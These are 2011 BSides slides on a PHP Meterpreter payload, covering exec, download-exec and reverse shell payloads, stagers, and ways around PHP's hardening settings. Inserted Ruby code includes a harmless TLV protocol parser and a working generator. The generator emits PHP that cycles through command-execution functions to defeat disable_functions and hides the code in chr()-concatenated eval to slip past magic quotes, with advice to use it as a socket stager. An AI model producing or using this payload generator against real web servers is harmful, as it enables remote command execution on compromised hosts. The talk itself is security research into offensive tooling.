Presented at BSides Las Vegas, 2011
1. Beyond r57
egypt@metasploit.com

2. Outline

3. PHP Background
• It's terrible
• It's always been terrible
• Objects are an afterthought
• Function names aren't consistent

4. Why bother? (what's wrong with existing PHP shells like r57)
• They have to be uploaded and configured
  – Leaves logs and files on disk
• Some call home to their authors
• They all focus on the server
  – Maybe the database, too
• Nothing looks beyond the server, to the network

5. Rome Wasn't Sacked in a Day
• Build payloads from simple to complex

6. Essence of Payloads
• Create a form of communication
• Do your bidding

7. Simplest: exec
• Just run a system command
• Don't care about input/output
• php/exec

8. Slightly less simple: download-exec
• Go grab an executable from a listening web server
• Save it to disk and run it
• Still don't care about input/output
• php/download_exec

9. More complex: shell
• Need to have a comm channel
• Listen for input and send back output
• php/reverse_tcp
• php/bind_tcp

10. Meterpreter
• Flexible, extensible, capable
• php/meterpreter/reverse_tcp
• php/meterpreter/bind_tcp

11. Meterpreter for Pwned Home Pages
• Doesn't have to be on disk
• Uses the same protocol and extension system
  – The existing client works just fine
• Does as much as possible without using a shell
  – Works in a chroot, doesn't require /bin/sh
• Platform independent; works anywhere PHP works

12. Meterpreter Required Reading
• "Beyond EIP", 2006
  – skape and spoonm, Black Hat Federal
• "Hacking Macs for Fun and Profit", 2009
  – Dino Dai Zovi and Charlie Miller, CanSecWest

13. Why is Meterpreter cool?
• Works even in restrictive environments
• Not limited to installed commands
• If it has more access, it can do cooler stuff
• Programmatically automatable

14. Meterpreter screenshot
[screenshot of a Meterpreter session]

15. Meterpreter
• Flexible extension system
• Uses a (mostly) binary protocol
  – TLV (Type, Length, Value)
  – Designed for extensibility

16. Meterpreter Protocol

  | 4 bytes | 4 bytes | ($length - 8) bytes |
  | Length  | Type    | Value               |
  | Length  | Type    | Value               | ...

Each TLV is a 4-byte length, a 4-byte type and the value; the length counts the 8-byte header itself, so the value is $length - 8 bytes long. TLVs are simply concatenated one after another.

17. Meterpreter Protocol
• Packets are themselves TLVs
• TLVs make parsing simple and flexible
  – No formatting knowledge is required outside of the TLV structure
  – Allows a core packet parsing engine without any knowledge of extensions or their protocols
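The framing on slides 15 to 17, worked through as an added example in Ruby (the language of the Metasploit client side); this is not code from the talk or from Metasploit. It encodes and decodes TLVs and shows why a packet that is itself a TLV lets one parser handle everything: the parser only knows the 8-byte header, and the meta-type bits in the type field say how to interpret a value. The meta-type and type constants below are assumed to match Meterpreter's protocol definition; check them against the framework source before relying on them.

```ruby
# Added example, not Metasploit's code: the TLV framing from slides 15-17 as a
# small encoder/decoder. Byte order is network (big-endian). The constant
# values follow the Meterpreter protocol definition as understood here and
# should be checked against the framework source (assumption).

# Meta-type bits in the high part of the type field say how to decode a value.
TLV_META_TYPE_STRING = 1 << 16
TLV_META_TYPE_UINT   = 1 << 17
TLV_META_TYPE_GROUP  = 1 << 30

# A few concrete types built from meta-type | id.
TLV_TYPE_METHOD     = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_RESULT     = TLV_META_TYPE_UINT   | 4

PACKET_TYPE_REQUEST  = 0
PACKET_TYPE_RESPONSE = 1

# One TLV: 4-byte length (counting the 8-byte header, so the value is
# $length - 8 bytes long), 4-byte type, value bytes.
def tlv_encode(type, value)
  bytes =
    if (type & TLV_META_TYPE_UINT) != 0
      [Integer(value)].pack('N')
    elsif (type & TLV_META_TYPE_STRING) != 0
      value.to_s.b + "\x00".b          # strings travel NUL-terminated
    else
      value.to_s.b                     # raw bytes or a pre-built group body
    end
  [bytes.bytesize + 8, type].pack('NN') + bytes
end

# A packet is itself a TLV: its value is the concatenation of child TLVs and
# its type field carries the packet type.
def packet_encode(packet_type, tlvs)
  body = tlvs.map { |type, value| tlv_encode(type, value) }.join
  [body.bytesize + 8, packet_type].pack('NN') + body
end

# Split a run of consecutive TLVs into [type, raw_value] pairs. This needs
# nothing but the framing: no knowledge of extensions or their types.
def tlv_parse(buf)
  out = []
  off = 0
  while off < buf.bytesize
    raise "truncated TLV header at offset #{off}" if buf.bytesize - off < 8
    len, type = buf.byteslice(off, 8).unpack('NN')
    raise "bad TLV length #{len} at offset #{off}" if len < 8 || off + len > buf.bytesize
    out << [type, buf.byteslice(off + 8, len - 8)]
    off += len
  end
  out
end

# Turn a raw value into a Ruby value using the meta-type bits; groups recurse.
def tlv_decode_value(type, raw)
  if (type & TLV_META_TYPE_GROUP) != 0
    tlv_parse(raw).map { |t, r| [t, tlv_decode_value(t, r)] }
  elsif (type & TLV_META_TYPE_UINT) != 0
    raw.unpack1('N')
  elsif (type & TLV_META_TYPE_STRING) != 0
    raw.chomp("\x00")
  else
    raw
  end
end

# Decode a whole packet; the outer length must match the buffer exactly.
def packet_decode(buf)
  raise 'short packet' if buf.bytesize < 8
  len, packet_type = buf.byteslice(0, 8).unpack('NN')
  raise "packet length #{len} != #{buf.bytesize}" unless len == buf.bytesize
  tlvs = tlv_parse(buf.byteslice(8, len - 8)).map { |t, r| [t, tlv_decode_value(t, r)] }
  { type: packet_type, tlvs: tlvs }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a request naming a method and a request id.
  req = packet_encode(PACKET_TYPE_REQUEST,
                      [[TLV_TYPE_METHOD, 'core_channel_open'], [TLV_TYPE_REQUEST_ID, '1234']])
  p packet_decode(req)
end
```

The length checks in `tlv_parse` are the part worth copying: a parser that trusts the length field of data arriving from the network will read past the buffer on a truncated or hostile packet, and the PHP side of the session sees exactly that kind of input.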
18. Meterpreter Ruby API
• Powerful and flexible scripting capabilities
• Extensions create an attribute under the main client object
• Various bits of info in each extension
  – client.sys.config.sysinfo
  – client.net.socket.create_tcp_client_channel

19. Challenges of doing all this in PHP

20. Liabilities
• Magic quotes (magic_quotes_gpc backslash-escapes quotes in request data)
• Size restrictions
• Safe mode
• disable_functions setting in php.ini
• PHP quirks

21. We Don't Need No Stinking Quotes

22. Size Restrictions
• URL length is limited by the web server: Apache's LimitRequestLine defaults to 8190 bytes
• The length of an HTTP header field is limited too: Apache's LimitRequestFieldSize also defaults to 8190 bytes
• Solution is the same as for other kinds of shellcode: stagers
  – Set up some kind of communication with the attacker, read in more code, eval it

23. Safe Mode
• Kind of a bummer for some things
• Restricts file access and command execution
• Doesn't limit sockets in any way

24. disable_functions setting
• Sucks
• Can try a bunch of different functions with similar purposes until one works
  – shell_exec -> passthru -> system -> popen ...
• Esser's memory corruption fu
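Two of the liabilities from slides 20, 21 and 24 handled together in an added example (not from the talk or from Metasploit), written in Ruby because that is what Metasploit payload modules are written in: a generator that emits PHP. The emitted PHP tries the command-execution functions from slide 24 in order and uses the first one that survives disable_functions; the whole snippet is then rewritten so it contains no quote characters at all, which is one way to read slide 21: spell every byte as a `chr()` call and concatenate them, so magic_quotes_gpc has nothing to escape. The assumption that `function_exists()` returns false for a function listed in disable_functions, and the helper names, are this example's, not the page's.

```ruby
# Added example (not from the talk or Metasploit). Generates PHP that survives
# two of the liabilities on slides 20-24:
#  1. disable_functions: try several exec functions and use the first that is
#     still available. Assumption: function_exists() returns false for names
#     listed in disable_functions, so it doubles as the availability check.
#  2. magic_quotes_gpc: request data gets quotes backslash-escaped, so the
#     generated code is rewritten to contain no quote characters at all.

# A single-quoted PHP string literal, escaping the only two special chars.
def php_string(s)
  "'" + s.gsub(/[\\']/) { |m| "\\" + m } + "'"
end

# PHP that runs $c via the first usable candidate and echoes the output.
# Only PHP 4.3-era functions are used (slide 25: can't assume anything newer).
def php_exec_fallback(cmd)
  [
    "$c = #{php_string(cmd)};",
    "$o = '';",
    "if (function_exists('shell_exec')) { $o = shell_exec($c); }",
    "elseif (function_exists('passthru')) { ob_start(); passthru($c); $o = ob_get_clean(); }",
    "elseif (function_exists('system')) { ob_start(); system($c); $o = ob_get_clean(); }",
    "elseif (function_exists('popen')) { $h = popen($c, 'r'); while (!feof($h)) { $o .= fread($h, 4096); } pclose($h); }",
    "elseif (function_exists('proc_open')) { $d = array(1 => array('pipe', 'w')); $p = proc_open($c, $d, $pp); while (!feof($pp[1])) { $o .= fread($pp[1], 4096); } fclose($pp[1]); proc_close($p); }",
    "echo $o;"
  ].join("\n")
end

# Spell a byte string as a PHP expression built only from chr(n) calls and
# the concatenation operator: no quotes, no backslashes, nothing for
# magic_quotes_gpc to touch.
def php_chr_concat(bytes)
  raise ArgumentError, 'cannot spell an empty string without quotes' if bytes.empty?
  bytes.each_byte.map { |b| "chr(#{b})" }.join('.')
end

# Wrap arbitrary PHP source so it can travel through a request parameter.
def php_quote_free(src)
  "eval(#{php_chr_concat(src)});"
end

# The two pieces together: a command-exec payload safe for a magic-quoted GET.
def php_payload(cmd)
  php_quote_free(php_exec_fallback(cmd))
end

if __FILE__ == $PROGRAM_NAME
  puts php_payload('id')
end
```

The cost is obvious in the output: every byte of source becomes eight or nine bytes of `chr(n).`, so a payload wrapped this way runs into the URL and header limits on slide 22 almost immediately. That is why the wrapped code should be a tiny stager that opens a socket and evals what it reads, rather than the whole payload.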
25. PHP Quirks
• Stream vs socket resources
  – Streams (fsockopen, stream_socket_client) go with stream_select(); sockets from socket_create() go with socket_select(); the two resource types can't be mixed
• Operator precedence: == binds tighter than & in PHP
  – $var & CONST == CONST
  – is parsed as $var & (CONST == CONST)
  – which is just $var & 1
  – Parenthesize: ($var & CONST) == CONST
• Can't assume anything newer than PHP 4.3

26. Assets
• Many ways of doing the same thing
  – System commands, sockets
• Your brains, his strength, my steel.

27. Running System Commands
• system, exec, popen, pcntl_exec, shell_exec, passthru, proc_open
• A few non-default extensions: perl, win32std, win32service, almost certainly others

28. Communications
• Use the web server
  – Simple, effective; most existing payloads do this
  – Leaves logs =(
• Programs on the system: nc, bash, ftp, ...
  – No guarantee they'll be there or work
• Sockets

29. Sockets
• fsockopen, pfsockopen, socket_create, stream_socket_client, fopen
• Extensions: curl, perl (wtf?)

30. Files
• fopen is usually enough
  – Nobody disables it because it would break everything

31. Future
• Javaterpreter, JSPterpreter
  – Already in the works, written by mihi
• ASPterpreter?
• Macterpreter/POSIX Meterpreter
  – Most of the code is there but is not really usable

32. What should I call it?
• PHP Meterpreter, php-terpreter
• meterphpreter (pronounced "meterfpreter")
• phpterpreter (pronounced "fapterpreter")
• phpsucksmyballsterpreter

33. Demos

34. Questions